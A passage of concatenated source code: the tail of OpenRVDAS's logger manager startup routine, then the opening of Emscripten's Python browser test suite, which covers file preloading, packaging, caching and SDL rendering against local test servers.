supervisor = LoggerSupervisor(
configs=None,
stderr_file_pattern=args.stderr_file_pattern,
stderr_data_server=args.data_server_websocket,
max_tries=args.max_tries,
interval=args.interval,
logger_log_level=logger_log_level)
############################
# Create our LoggerManager
logger_manager = LoggerManager(
api=api, supervisor=supervisor,
data_server_websocket=args.data_server_websocket,
stderr_file_pattern=args.stderr_file_pattern,
interval=args.interval,
log_level=log_level,
logger_log_level=logger_log_level)
# When told to quit, shut down gracefully
api.on_quit(callback=logger_manager.quit)
api.on_quit(callback=supervisor.quit)
# When an active config changes in the database, update our configs here
api.on_update(callback=logger_manager._update_configs)
# When new configs are loaded, update our file of config processes
api.on_load(callback=logger_manager._load_new_definition_from_api)
############################
# Start all the various LoggerManager threads running
logger_manager.start()
############################
# If they've given us an initial configuration, get and load it.
if args.config:
config = read_config(args.config)
# Hacky bit: need to stash the config filename for posterity
if 'cruise' in config:
config['cruise']['config_filename'] = args.config
api.load_configuration(config)
active_mode = args.mode or api.get_default_mode()
api.set_active_mode(active_mode)
api.message_log(source=SOURCE_NAME, user='(%s@%s)' % (USER, HOSTNAME),
log_level=api.INFO,
message='started with: %s, mode %s' %
(args.config, active_mode))
try:
# If no console, just wait for the configuration update thread to
# end as a signal that we're done.
if args.no_console:
logging.warning('--no-console specified; waiting for LoggerManager '
'to exit.')
if logger_manager.update_configs_thread:
logger_manager.update_configs_thread.join()
else:
logging.warning('LoggerManager has no update_configs_thread? '
'Exiting...')
else:
# Create reader to read/process commands from stdin. Note: this
# needs to be in main thread for Ctrl-C termination to be properly
# caught and processed, otherwise interrupts go to the wrong places.
# Set up command line interface to get commands. Start by
# reading history file, if one exists, to get past commands.
hist_filename = '.openrvdas_logger_manager_history'
hist_path = os.path.join(os.path.expanduser('~'), hist_filename)
try:
readline.read_history_file(hist_path)
# default history len is -1 (infinite), which may grow unruly
readline.set_history_length(1000)
except (FileNotFoundError, PermissionError):
pass
atexit.register(readline.write_history_file, hist_path)
command_line_reader = ServerAPICommandLine(api=api)
command_line_reader.run()
except KeyboardInterrupt:
pass
logging.debug('Done with logger_manager.py - exiting')
# Ask our LoggerSupervisor to shut down.
if supervisor:
supervisor.quit()
|
test_browser.py
|
# coding=utf-8
# Copyright 2013 The Emscripten Authors. All rights reserved.
# Emscripten is available under two separate licenses, the MIT license and the
# University of Illinois/NCSA Open Source License. Both these licenses can be
# found in the LICENSE file.
import argparse
import json
import multiprocessing
import os
import random
import shlex
import shutil
import subprocess
import time
import unittest
import webbrowser
import zlib
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.request import urlopen
from runner import BrowserCore, RunnerCore, path_from_root, has_browser, EMTEST_BROWSER, Reporting
from runner import create_file, parameterized, ensure_dir, disabled, test_file, WEBIDL_BINDER
from tools import building
from tools import shared
from tools import system_libs
from tools.shared import EMCC, WINDOWS, FILE_PACKAGER, PIPE
from tools.shared import try_delete, config
def test_chunked_synchronous_xhr_server(support_byte_ranges, chunkSize, data, checksum, port):
class ChunkedServerHandler(BaseHTTPRequestHandler):
def sendheaders(s, extra=[], length=len(data)):
s.send_response(200)
s.send_header("Content-Length", str(length))
s.send_header("Access-Control-Allow-Origin", "http://localhost:%s" % port)
s.send_header('Cross-Origin-Resource-Policy', 'cross-origin')
s.send_header('Cache-Control', 'no-cache, no-store, must-revalidate')
s.send_header("Access-Control-Expose-Headers", "Content-Length, Accept-Ranges")
s.send_header("Content-type", "application/octet-stream")
if support_byte_ranges:
s.send_header("Accept-Ranges", "bytes")
for i in extra:
s.send_header(i[0], i[1])
s.end_headers()
def do_HEAD(s):
s.sendheaders()
def do_OPTIONS(s):
s.sendheaders([("Access-Control-Allow-Headers", "Range")], 0)
def do_GET(s):
if s.path == '/':
s.sendheaders()
elif not support_byte_ranges:
s.sendheaders()
s.wfile.write(data)
else:
start, end = s.headers.get("range").split("=")[1].split("-")
start = int(start)
end = int(end)
end = min(len(data) - 1, end)
length = end - start + 1
s.sendheaders([], length)
s.wfile.write(data[start:end + 1])
# CORS preflight makes OPTIONS requests which we need to account for.
expectedConns = 22
httpd = HTTPServer(('localhost', 11111), ChunkedServerHandler)
for i in range(expectedConns + 1):
httpd.handle_request()
def shell_with_script(shell_file, output_file, replacement):
with open(path_from_root('src', shell_file)) as input:
with open(output_file, 'w') as output:
output.write(input.read().replace('{{{ SCRIPT }}}', replacement))
def is_chrome():
return EMTEST_BROWSER and 'chrom' in EMTEST_BROWSER.lower()
def no_chrome(note='chrome is not supported'):
if is_chrome():
return unittest.skip(note)
return lambda f: f
def is_firefox():
return EMTEST_BROWSER and 'firefox' in EMTEST_BROWSER.lower()
def no_firefox(note='firefox is not supported'):
if is_firefox():
return unittest.skip(note)
return lambda f: f
def no_swiftshader(f):
assert callable(f)
def decorated(self):
if is_chrome() and '--use-gl=swiftshader' in EMTEST_BROWSER:
self.skipTest('not compatible with swiftshader')
return f(self)
return decorated
def requires_threads(f):
assert callable(f)
def decorated(self, *args, **kwargs):
if os.environ.get('EMTEST_LACKS_THREAD_SUPPORT'):
self.skipTest('EMTEST_LACKS_THREAD_SUPPORT is set')
return f(self, *args, **kwargs)
return decorated
def requires_asmfs(f):
assert callable(f)
def decorated(self, *args, **kwargs):
# https://github.com/emscripten-core/emscripten/issues/9534
self.skipTest('ASMFS is looking for a maintainer')
return f(self, *args, **kwargs)
return decorated
# Today we only support the wasm backend, so any test that was disabled under
# the llvm backend is now always disabled.
# TODO(sbc): Investigate all tests with this decorator and either fix or remove the test.
def no_wasm_backend(note=''):
assert not callable(note)
return unittest.skip(note)
requires_graphics_hardware = unittest.skipIf(os.getenv('EMTEST_LACKS_GRAPHICS_HARDWARE'), "This test requires graphics hardware")
requires_sound_hardware = unittest.skipIf(os.getenv('EMTEST_LACKS_SOUND_HARDWARE'), "This test requires sound hardware")
requires_sync_compilation = unittest.skipIf(is_chrome(), "This test requires synchronous compilation, which does not work in Chrome (except for tiny wasms)")
requires_offscreen_canvas = unittest.skipIf(os.getenv('EMTEST_LACKS_OFFSCREEN_CANVAS'), "This test requires a browser with OffscreenCanvas")
class browser(BrowserCore):
@classmethod
def setUpClass(cls):
super().setUpClass()
cls.browser_timeout = 60
print()
print('Running the browser tests. Make sure the browser allows popups from localhost.')
print()
def setUp(self):
super().setUp()
# avoid various compiler warnings that many browser tests currently generate
self.emcc_args += [
'-Wno-pointer-sign',
'-Wno-int-conversion',
]
def test_sdl1_in_emscripten_nonstrict_mode(self):
if 'EMCC_STRICT' in os.environ and int(os.environ['EMCC_STRICT']):
self.skipTest('This test requires being run in non-strict mode (EMCC_STRICT env. variable unset)')
# TODO: This test is verifying behavior that will be deprecated at some point in the future, remove this test once
# system JS libraries are no longer automatically linked.
self.btest('hello_world_sdl.cpp', reference='htmltest.png')
def test_sdl1(self):
self.btest('hello_world_sdl.cpp', reference='htmltest.png', args=['-lSDL', '-lGL'])
self.btest('hello_world_sdl.cpp', reference='htmltest.png', args=['-s', 'USE_SDL', '-lGL']) # is the default anyhow
# Deliberately named as test_zzz_* to make this test the last one
# as this test may take the focus away from the main test window
# by opening a new window and possibly not closing it.
def test_zzz_html_source_map(self):
if not has_browser():
self.skipTest('need a browser')
cpp_file = 'src.cpp'
html_file = 'src.html'
# browsers will try to 'guess' the corresponding original line if a
# generated line is unmapped, so if we want to make sure that our
# numbering is correct, we need to provide a couple of 'possible wrong
# answers'. thus, we add some printf calls so that the cpp file gets
# multiple mapped lines. in other words, if the program consists of a
# single 'throw' statement, browsers may just map any thrown exception to
# that line, because it will be the only mapped line.
with open(cpp_file, 'w') as f:
f.write(r'''
#include <cstdio>
int main() {
printf("Starting test\n");
try {
throw 42; // line 8
} catch (int e) { }
printf("done\n");
return 0;
}
''')
# use relative paths when calling emcc, because file:// URIs can only load
# sourceContent when the maps are relative paths
try_delete(html_file)
try_delete(html_file + '.map')
self.compile_btest(['src.cpp', '-o', 'src.html', '-gsource-map'])
self.assertExists(html_file)
self.assertExists('src.wasm.map')
webbrowser.open_new('file://' + html_file)
print('''
If manually bisecting:
Check that you see src.cpp among the page sources.
Even better, add a breakpoint, e.g. on the printf, then reload, then step
through and see the print (best to run with EMTEST_SAVE_DIR=1 for the reload).
''')
def test_emscripten_log(self):
self.btest_exit(test_file('emscripten_log', 'emscripten_log.cpp'),
args=['--pre-js', path_from_root('src', 'emscripten-source-map.min.js'), '-gsource-map'])
def test_preload_file(self):
absolute_src_path = os.path.join(self.get_dir(), 'somefile.txt').replace('\\', '/')
open(absolute_src_path, 'w').write('''load me right before running the code please''')
absolute_src_path2 = os.path.join(self.get_dir(), '.somefile.txt').replace('\\', '/')
open(absolute_src_path2, 'w').write('''load me right before running the code please''')
absolute_src_path3 = os.path.join(self.get_dir(), 'some@file.txt').replace('\\', '/')
open(absolute_src_path3, 'w').write('''load me right before running the code please''')
def make_main(path):
print('make main at', path)
path = path.replace('\\', '\\\\').replace('"', '\\"') # Escape tricky path name for use inside a C string.
create_file('main.cpp', r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
FILE *f = fopen("%s", "r");
char buf[100];
fread(buf, 1, 20, f);
buf[20] = 0;
fclose(f);
printf("|%%s|\n", buf);
int result = !strcmp("load me right before", buf);
REPORT_RESULT(result);
return 0;
}
''' % path)
test_cases = [
# (source preload-file string, file on target FS to load)
("somefile.txt", "somefile.txt"),
(".somefile.txt@somefile.txt", "somefile.txt"),
("./somefile.txt", "somefile.txt"),
("somefile.txt@file.txt", "file.txt"),
("./somefile.txt@file.txt", "file.txt"),
("./somefile.txt@./file.txt", "file.txt"),
("somefile.txt@/file.txt", "file.txt"),
("somefile.txt@/", "somefile.txt"),
(absolute_src_path + "@file.txt", "file.txt"),
(absolute_src_path + "@/file.txt", "file.txt"),
(absolute_src_path + "@/", "somefile.txt"),
("somefile.txt@/directory/file.txt", "/directory/file.txt"),
("somefile.txt@/directory/file.txt", "directory/file.txt"),
(absolute_src_path + "@/directory/file.txt", "directory/file.txt"),
("some@@file.txt@other.txt", "other.txt"),
("some@@file.txt@some@@otherfile.txt", "some@otherfile.txt")]
for srcpath, dstpath in test_cases:
print('Testing', srcpath, dstpath)
make_main(dstpath)
self.compile_btest(['main.cpp', '--preload-file', srcpath, '-o', 'page.html'])
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
if WINDOWS:
# On Windows, the following non-alphanumeric non-control code ASCII characters are supported.
# The characters <, >, ", |, ?, * are not allowed, because the Windows filesystem doesn't support those.
tricky_filename = '!#$%&\'()+,-. ;=@[]^_`{}~.txt'
else:
# All 7-bit non-alphanumeric non-control code ASCII characters except /, : and \ are allowed.
tricky_filename = '!#$%&\'()+,-. ;=@[]^_`{}~ "*<>?|.txt'
open(os.path.join(self.get_dir(), tricky_filename), 'w').write('''load me right before running the code please''')
make_main(tricky_filename)
# As an Emscripten-specific feature, the character '@' must be escaped in the form '@@' to not confuse with the 'src@dst' notation.
self.compile_btest(['main.cpp', '--preload-file', tricky_filename.replace('@', '@@'), '-o', 'page.html'])
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
# By absolute path
make_main('somefile.txt') # absolute becomes relative
self.compile_btest(['main.cpp', '--preload-file', absolute_src_path, '-o', 'page.html'])
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
# Test subdirectory handling with asset packaging.
try_delete('assets')
ensure_dir('assets/sub/asset1/'.replace('\\', '/'))
ensure_dir('assets/sub/asset1/.git'.replace('\\', '/')) # Test adding directory that shouldn't exist.
ensure_dir('assets/sub/asset2/'.replace('\\', '/'))
create_file('assets/sub/asset1/file1.txt', '''load me right before running the code please''')
create_file('assets/sub/asset1/.git/shouldnt_be_embedded.txt', '''this file should not get embedded''')
create_file('assets/sub/asset2/file2.txt', '''load me right before running the code please''')
absolute_assets_src_path = 'assets'.replace('\\', '/')
def make_main_two_files(path1, path2, nonexistingpath):
create_file('main.cpp', r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
FILE *f = fopen("%s", "r");
char buf[100];
fread(buf, 1, 20, f);
buf[20] = 0;
fclose(f);
printf("|%%s|\n", buf);
int result = !strcmp("load me right before", buf);
f = fopen("%s", "r");
if (f == NULL)
result = 0;
fclose(f);
f = fopen("%s", "r");
if (f != NULL)
result = 0;
REPORT_RESULT(result);
return 0;
}
''' % (path1, path2, nonexistingpath))
test_cases = [
# (source directory to embed, file1 on target FS to load, file2 on target FS to load, name of a file that *shouldn't* exist on VFS)
("assets", "assets/sub/asset1/file1.txt", "assets/sub/asset2/file2.txt", "assets/sub/asset1/.git/shouldnt_be_embedded.txt"),
("assets/", "assets/sub/asset1/file1.txt", "assets/sub/asset2/file2.txt", "assets/sub/asset1/.git/shouldnt_be_embedded.txt"),
("assets@/", "/sub/asset1/file1.txt", "/sub/asset2/file2.txt", "/sub/asset1/.git/shouldnt_be_embedded.txt"),
("assets/@/", "/sub/asset1/file1.txt", "/sub/asset2/file2.txt", "/sub/asset1/.git/shouldnt_be_embedded.txt"),
("assets@./", "/sub/asset1/file1.txt", "/sub/asset2/file2.txt", "/sub/asset1/.git/shouldnt_be_embedded.txt"),
(absolute_assets_src_path + "@/", "/sub/asset1/file1.txt", "/sub/asset2/file2.txt", "/sub/asset1/.git/shouldnt_be_embedded.txt"),
(absolute_assets_src_path + "@/assets", "/assets/sub/asset1/file1.txt", "/assets/sub/asset2/file2.txt", "assets/sub/asset1/.git/shouldnt_be_embedded.txt")]
for test in test_cases:
(srcpath, dstpath1, dstpath2, nonexistingpath) = test
make_main_two_files(dstpath1, dstpath2, nonexistingpath)
print(srcpath)
self.compile_btest(['main.cpp', '--preload-file', srcpath, '--exclude-file', '*/.*', '-o', 'page.html'])
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
# Should still work with -o subdir/..
make_main('somefile.txt') # absolute becomes relative
ensure_dir('dirrey')
self.compile_btest(['main.cpp', '--preload-file', absolute_src_path, '-o', 'dirrey/page.html'])
self.run_browser('dirrey/page.html', 'You should see |load me right before|.', '/report_result?1')
# With FS.preloadFile
create_file('pre.js', '''
Module.preRun = function() {
FS.createPreloadedFile('/', 'someotherfile.txt', 'somefile.txt', true, false); // we need --use-preload-plugins for this.
};
''')
make_main('someotherfile.txt')
self.compile_btest(['main.cpp', '--pre-js', 'pre.js', '-o', 'page.html', '--use-preload-plugins'])
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
# Tests that user .html shell files can manually download .data files created with --preload-file cmdline.
def test_preload_file_with_manual_data_download(self):
src = test_file('manual_download_data.cpp')
create_file('file.txt', '''Hello!''')
self.compile_btest([src, '-o', 'manual_download_data.js', '--preload-file', 'file.txt@/file.txt'])
shutil.copyfile(test_file('manual_download_data.html'), 'manual_download_data.html')
self.run_browser('manual_download_data.html', 'Hello!', '/report_result?1')
# Tests that if the output files have single or double quotes in them, that it will be handled by correctly escaping the names.
def test_output_file_escaping(self):
tricky_part = '\'' if WINDOWS else '\' and \"' # On Windows, files/directories may not contain a double quote character. On non-Windowses they can, so test that.
d = 'dir with ' + tricky_part
abs_d = os.path.join(self.get_dir(), d)
ensure_dir(abs_d)
txt = 'file with ' + tricky_part + '.txt'
abs_txt = os.path.join(abs_d, txt)
open(abs_txt, 'w').write('load me right before')
cpp = os.path.join(d, 'file with ' + tricky_part + '.cpp')
open(cpp, 'w').write(r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
FILE *f = fopen("%s", "r");
char buf[100];
fread(buf, 1, 20, f);
buf[20] = 0;
fclose(f);
printf("|%%s|\n", buf);
int result = !strcmp("|load me right before|", buf);
REPORT_RESULT(result);
return 0;
}
''' % (txt.replace('\'', '\\\'').replace('\"', '\\"')))
data_file = os.path.join(abs_d, 'file with ' + tricky_part + '.data')
data_js_file = os.path.join(abs_d, 'file with ' + tricky_part + '.js')
self.run_process([FILE_PACKAGER, data_file, '--use-preload-cache', '--indexedDB-name=testdb', '--preload', abs_txt + '@' + txt, '--js-output=' + data_js_file])
page_file = os.path.join(d, 'file with ' + tricky_part + '.html')
abs_page_file = os.path.join(self.get_dir(), page_file)
self.compile_btest([cpp, '--pre-js', data_js_file, '-o', abs_page_file, '-s', 'FORCE_FILESYSTEM'])
self.run_browser(page_file, '|load me right before|.', '/report_result?0')
def test_preload_caching(self):
create_file('main.cpp', r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
extern "C" {
extern int checkPreloadResults();
}
int main(int argc, char** argv) {
FILE *f = fopen("%s", "r");
char buf[100];
fread(buf, 1, 20, f);
buf[20] = 0;
fclose(f);
printf("|%%s|\n", buf);
int result = 0;
result += !strcmp("load me right before", buf);
result += checkPreloadResults();
REPORT_RESULT(result);
return 0;
}
''' % 'somefile.txt')
create_file('test.js', '''
mergeInto(LibraryManager.library, {
checkPreloadResults: function() {
var cached = 0;
var packages = Object.keys(Module['preloadResults']);
packages.forEach(function(package) {
var fromCache = Module['preloadResults'][package]['fromCache'];
if (fromCache)
++ cached;
});
return cached;
}
});
''')
# test caching of various sizes, including sizes higher than 128MB which is
# chrome's limit on IndexedDB item sizes, see
# https://cs.chromium.org/chromium/src/content/renderer/indexed_db/webidbdatabase_impl.cc?type=cs&q=%22The+serialized+value+is+too+large%22&sq=package:chromium&g=0&l=177
# https://cs.chromium.org/chromium/src/out/Debug/gen/third_party/blink/public/mojom/indexeddb/indexeddb.mojom.h?type=cs&sq=package:chromium&g=0&l=60
for extra_size in (0, 1 * 1024 * 1024, 100 * 1024 * 1024, 150 * 1024 * 1024):
if is_chrome() and extra_size >= 100 * 1024 * 1024:
continue
create_file('somefile.txt', '''load me right before running the code please''' + ('_' * extra_size))
print('size:', os.path.getsize('somefile.txt'))
self.compile_btest(['main.cpp', '--use-preload-cache', '--js-library', 'test.js', '--preload-file', 'somefile.txt', '-o', 'page.html', '-s', 'ALLOW_MEMORY_GROWTH'])
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?2')
def test_preload_caching_indexeddb_name(self):
create_file('somefile.txt', '''load me right before running the code please''')
def make_main(path):
print(path)
create_file('main.cpp', r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
extern "C" {
extern int checkPreloadResults();
}
int main(int argc, char** argv) {
FILE *f = fopen("%s", "r");
char buf[100];
fread(buf, 1, 20, f);
buf[20] = 0;
fclose(f);
printf("|%%s|\n", buf);
int result = 0;
result += !strcmp("load me right before", buf);
result += checkPreloadResults();
REPORT_RESULT(result);
return 0;
}
''' % path)
create_file('test.js', '''
mergeInto(LibraryManager.library, {
checkPreloadResults: function() {
var cached = 0;
var packages = Object.keys(Module['preloadResults']);
packages.forEach(function(package) {
var fromCache = Module['preloadResults'][package]['fromCache'];
if (fromCache)
++ cached;
});
return cached;
}
});
''')
make_main('somefile.txt')
self.run_process([FILE_PACKAGER, 'somefile.data', '--use-preload-cache', '--indexedDB-name=testdb', '--preload', 'somefile.txt', '--js-output=' + 'somefile.js'])
self.compile_btest(['main.cpp', '--js-library', 'test.js', '--pre-js', 'somefile.js', '-o', 'page.html', '-s', 'FORCE_FILESYSTEM'])
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?2')
def test_multifile(self):
# a few files inside a directory
ensure_dir(os.path.join('subdirr', 'moar'))
create_file(os.path.join('subdirr', 'data1.txt'), '1214141516171819')
create_file(os.path.join('subdirr', 'moar', 'data2.txt'), '3.14159265358979')
create_file('main.cpp', r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
char buf[17];
FILE *f = fopen("subdirr/data1.txt", "r");
fread(buf, 1, 16, f);
buf[16] = 0;
fclose(f);
printf("|%s|\n", buf);
int result = !strcmp("1214141516171819", buf);
FILE *f2 = fopen("subdirr/moar/data2.txt", "r");
fread(buf, 1, 16, f2);
buf[16] = 0;
fclose(f2);
printf("|%s|\n", buf);
result = result && !strcmp("3.14159265358979", buf);
REPORT_RESULT(result);
return 0;
}
''')
# by individual files
self.compile_btest(['main.cpp', '--preload-file', 'subdirr/data1.txt', '--preload-file', 'subdirr/moar/data2.txt', '-o', 'page.html'])
self.run_browser('page.html', 'You should see two cool numbers', '/report_result?1')
os.remove('page.html')
# by directory, and remove files to make sure
self.compile_btest(['main.cpp', '--preload-file', 'subdirr', '-o', 'page.html'])
shutil.rmtree('subdirr')
self.run_browser('page.html', 'You should see two cool numbers', '/report_result?1')
def test_custom_file_package_url(self):
# a few files inside a directory
ensure_dir('subdirr')
ensure_dir('cdn')
create_file(os.path.join('subdirr', 'data1.txt'), '1214141516171819')
# change the file package base dir to look in a "cdn". note that normally
# you would add this in your own custom html file etc., and not by
# modifying the existing shell in this manner
create_file('shell.html', open(path_from_root('src', 'shell.html')).read().replace('var Module = {', 'var Module = { locateFile: function (path, prefix) {if (path.endsWith(".wasm")) {return prefix + path;} else {return "cdn/" + path;}}, '))
create_file('main.cpp', r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
char buf[17];
FILE *f = fopen("subdirr/data1.txt", "r");
fread(buf, 1, 16, f);
buf[16] = 0;
fclose(f);
printf("|%s|\n", buf);
int result = !strcmp("1214141516171819", buf);
REPORT_RESULT(result);
return 0;
}
''')
self.compile_btest(['main.cpp', '--shell-file', 'shell.html', '--preload-file', 'subdirr/data1.txt', '-o', 'test.html'])
shutil.move('test.data', os.path.join('cdn', 'test.data'))
self.run_browser('test.html', '', '/report_result?1')
def test_missing_data_throws_error(self):
def setup(assetLocalization):
self.clear()
create_file('data.txt', 'data')
create_file('main.cpp', r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
// This code should never be executed, because the required dependency file is missing.
REPORT_RESULT(0);
return 0;
}
''')
create_file('on_window_error_shell.html', r'''
<html>
<center><canvas id='canvas' width='256' height='256'></canvas></center>
<hr><div id='output'></div><hr>
<script type='text/javascript'>
window.onerror = function(error) {
window.onerror = null;
var result = error.indexOf("test.data") >= 0 ? 1 : 0;
var xhr = new XMLHttpRequest();
xhr.open('GET', 'http://localhost:8888/report_result?' + result, true);
xhr.send();
setTimeout(function() { window.close() }, 1000);
}
var Module = {
locateFile: function (path, prefix) {if (path.endsWith(".wasm")) {return prefix + path;} else {return "''' + assetLocalization + r'''" + path;}},
print: (function() {
var element = document.getElementById('output');
return function(text) { element.innerHTML += text.replace('\n', '<br>', 'g') + '<br>';};
})(),
canvas: document.getElementById('canvas')
};
</script>
{{{ SCRIPT }}}
</body>
</html>''')
def test():
# test: a missing file should trigger xhr.onload with a status other than 200, 304 or 206
setup("")
self.compile_btest(['main.cpp', '--shell-file', 'on_window_error_shell.html', '--preload-file', 'data.txt', '-o', 'test.html'])
shutil.move('test.data', 'missing.data')
self.run_browser('test.html', '', '/report_result?1')
# test unknown protocol should go through xhr.onerror
setup("unknown_protocol://")
self.compile_btest(['main.cpp', '--shell-file', 'on_window_error_shell.html', '--preload-file', 'data.txt', '-o', 'test.html'])
self.run_browser('test.html', '', '/report_result?1')
# test wrong protocol and port
setup("https://localhost:8800/")
self.compile_btest(['main.cpp', '--shell-file', 'on_window_error_shell.html', '--preload-file', 'data.txt', '-o', 'test.html'])
self.run_browser('test.html', '', '/report_result?1')
test()
# TODO: CORS, test using a full url for locateFile
# create_file('shell.html', open(path_from_root('src', 'shell.html')).read().replace('var Module = {', 'var Module = { locateFile: function (path) {return "http:/localhost:8888/cdn/" + path;}, '))
# test()
def test_dev_random(self):
self.btest(os.path.join('filesystem', 'dev_random.cpp'), expected='0')
def test_sdl_swsurface(self):
self.btest('sdl_swsurface.c', args=['-lSDL', '-lGL'], expected='1')
def test_sdl_surface_lock_opts(self):
# Test Emscripten-specific extensions to optimize SDL_LockSurface and SDL_UnlockSurface.
self.btest('hello_world_sdl.cpp', reference='htmltest.png', message='You should see "hello, world!" and a colored cube.', args=['-DTEST_SDL_LOCK_OPTS', '-lSDL', '-lGL'])
def test_sdl_image(self):
# load an image file, get pixel data. Also O2 coverage for --preload-file, and memory-init
shutil.copyfile(test_file('screenshot.jpg'), 'screenshot.jpg')
src = test_file('sdl_image.c')
for mem in [0, 1]:
for dest, dirname, basename in [('screenshot.jpg', '/', 'screenshot.jpg'),
('screenshot.jpg@/assets/screenshot.jpg', '/assets', 'screenshot.jpg')]:
self.compile_btest([
src, '-o', 'page.html', '-O2', '-lSDL', '-lGL', '--memory-init-file', str(mem),
'--preload-file', dest, '-DSCREENSHOT_DIRNAME="' + dirname + '"', '-DSCREENSHOT_BASENAME="' + basename + '"', '--use-preload-plugins'
])
self.run_browser('page.html', '', '/report_result?600')
def test_sdl_image_jpeg(self):
shutil.copyfile(test_file('screenshot.jpg'), 'screenshot.jpeg')
src = test_file('sdl_image.c')
self.compile_btest([
src, '-o', 'page.html', '-lSDL', '-lGL',
'--preload-file', 'screenshot.jpeg', '-DSCREENSHOT_DIRNAME="/"', '-DSCREENSHOT_BASENAME="screenshot.jpeg"', '--use-preload-plugins'
])
self.run_browser('page.html', '', '/report_result?600')
def test_sdl_image_prepare(self):
# load an image file, get pixel data.
shutil.copyfile(test_file('screenshot.jpg'), 'screenshot.not')
self.btest('sdl_image_prepare.c', reference='screenshot.jpg', args=['--preload-file', 'screenshot.not', '-lSDL', '-lGL'], also_proxied=True, manually_trigger_reftest=True)
def test_sdl_image_prepare_data(self):
# load an image file, get pixel data.
shutil.copyfile(test_file('screenshot.jpg'), 'screenshot.not')
self.btest('sdl_image_prepare_data.c', reference='screenshot.jpg', args=['--preload-file', 'screenshot.not', '-lSDL', '-lGL'], manually_trigger_reftest=True)
def test_sdl_image_must_prepare(self):
# load an image file, get pixel data.
shutil.copyfile(test_file('screenshot.jpg'), 'screenshot.jpg')
self.btest('sdl_image_must_prepare.c', reference='screenshot.jpg', args=['--preload-file', 'screenshot.jpg', '-lSDL', '-lGL'], manually_trigger_reftest=True)
def test_sdl_stb_image(self):
# load an image file, get pixel data.
shutil.copyfile(test_file('screenshot.jpg'), 'screenshot.not')
self.btest('sdl_stb_image.c', reference='screenshot.jpg', args=['-s', 'STB_IMAGE', '--preload-file', 'screenshot.not', '-lSDL', '-lGL'])
def test_sdl_stb_image_bpp(self):
# load grayscale image without alpha
self.clear()
shutil.copyfile(test_file('sdl-stb-bpp1.png'), 'screenshot.not')
self.btest('sdl_stb_image.c', reference='sdl-stb-bpp1.png', args=['-s', 'STB_IMAGE', '--preload-file', 'screenshot.not', '-lSDL', '-lGL'])
# load grayscale image with alpha
self.clear()
shutil.copyfile(test_file('sdl-stb-bpp2.png'), 'screenshot.not')
self.btest('sdl_stb_image.c', reference='sdl-stb-bpp2.png', args=['-s', 'STB_IMAGE', '--preload-file', 'screenshot.not', '-lSDL', '-lGL'])
# load RGB image
self.clear()
shutil.copyfile(test_file('sdl-stb-bpp3.png'), 'screenshot.not')
self.btest('sdl_stb_image.c', reference='sdl-stb-bpp3.png', args=['-s', 'STB_IMAGE', '--preload-file', 'screenshot.not', '-lSDL', '-lGL'])
# load RGBA image
self.clear()
shutil.copyfile(test_file('sdl-stb-bpp4.png'), 'screenshot.not')
self.btest('sdl_stb_image.c', reference='sdl-stb-bpp4.png', args=['-s', 'STB_IMAGE', '--preload-file', 'screenshot.not', '-lSDL', '-lGL'])
def test_sdl_stb_image_data(self):
# load an image file, get pixel data.
shutil.copyfile(test_file('screenshot.jpg'), 'screenshot.not')
self.btest('sdl_stb_image_data.c', reference='screenshot.jpg', args=['-s', 'STB_IMAGE', '--preload-file', 'screenshot.not', '-lSDL', '-lGL'])
def test_sdl_stb_image_cleanup(self):
shutil.copyfile(test_file('screenshot.jpg'), 'screenshot.not')
self.btest('sdl_stb_image_cleanup.c', expected='0', args=['-s', 'STB_IMAGE', '--preload-file', 'screenshot.not', '-lSDL', '-lGL', '--memoryprofiler'])
def test_sdl_canvas(self):
self.clear()
self.btest('sdl_canvas.c', expected='1', args=['-s', 'LEGACY_GL_EMULATION', '-lSDL', '-lGL'])
# some extra coverage
self.clear()
self.btest('sdl_canvas.c', expected='1', args=['-s', 'LEGACY_GL_EMULATION', '-O0', '-s', 'SAFE_HEAP', '-lSDL', '-lGL'])
self.clear()
self.btest('sdl_canvas.c', expected='1', args=['-s', 'LEGACY_GL_EMULATION', '-O2', '-s', 'SAFE_HEAP', '-lSDL', '-lGL'])
def post_manual_reftest(self, reference=None):
self.reftest(test_file(self.reference if reference is None else reference))
html = open('test.html').read()
html = html.replace('</body>', '''
<script>
function assert(x, y) { if (!x) throw 'assertion failed ' + y }
%s
var windowClose = window.close;
window.close = function() {
// wait for rafs to arrive and the screen to update before reftesting
setTimeout(function() {
doReftest();
setTimeout(windowClose, 5000);
}, 1000);
};
</script>
</body>''' % open('reftest.js').read())
create_file('test.html', html)
def test_sdl_canvas_proxy(self):
create_file('data.txt', 'datum')
self.btest('sdl_canvas_proxy.c', reference='sdl_canvas_proxy.png', args=['--proxy-to-worker', '--preload-file', 'data.txt', '-lSDL', '-lGL'], manual_reference=True, post_build=self.post_manual_reftest)
@requires_graphics_hardware
def test_glgears_proxy_jstarget(self):
# test .js target with --proxy-worker; emits 2 js files, client and worker
self.compile_btest([test_file('hello_world_gles_proxy.c'), '-o', 'test.js', '--proxy-to-worker', '-s', 'GL_TESTING', '-lGL', '-lglut'])
shell_with_script('shell_minimal.html', 'test.html', '<script src="test.js"></script>')
self.post_manual_reftest('gears.png')
self.run_browser('test.html', None, '/report_result?0')
def test_sdl_canvas_alpha(self):
# N.B. On Linux with Intel integrated graphics cards, this test needs Firefox 49 or newer.
# See https://github.com/emscripten-core/emscripten/issues/4069.
create_file('flag_0.js', '''
Module['arguments'] = ['-0'];
''')
